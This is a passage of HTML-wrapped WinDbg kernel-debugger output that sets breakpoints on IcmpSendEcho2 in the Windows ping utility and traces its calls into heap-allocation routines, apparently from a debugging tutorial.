font-family: "Courier New",Courier,monospace;"> 0007fff0 00000000 010028c6 00000000 78746341 kernel32!BaseProcessStart+0x23</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> ub 0100237b</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ping!main+0x9a0:</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 01002369 a4 movs byte ptr es:[edi],byte ptr [esi]</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0100236a 52 push edx</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0100236b 0001 add byte ptr [ecx],al</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0100236d 53 push ebx</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0100236e 53 push ebx</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0100236f 53 push ebx</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 01002370 ffb52cfbffff push dword ptr [ebp-4D4h]</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 01002376 e883070000 call ping!IcmpSendEcho2 (01002afe)</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> bp 01002376 </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> bd 0</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> bl</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0 d 76d6b73c 0001 (0001) iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 e 01002376 0001 (0001) ping!main+0x9ad</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> Breakpoint 1 hit</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ping!main+0x9ad:</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 001b:01002376 e883070000 call ping!IcmpSendEcho2 (01002afe)</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> wt</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ping!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 34 0 [ 0] iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 1] kernel32!LocalAlloc</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 2] kernel32!_SEH_prolog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 18 19 [ 1] kernel32!LocalAlloc</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 3] ntdll!_SEH_prolog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 42 19 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 11 0 [ 3] ntdll!RtlEnterCriticalSection</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 11 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 17 0 [ 3] ntdll!RtlpUpdateIndexRemoveBlock</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 17 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 3] ntdll!RtlpUpdateIndexInsertBlock</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 19 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 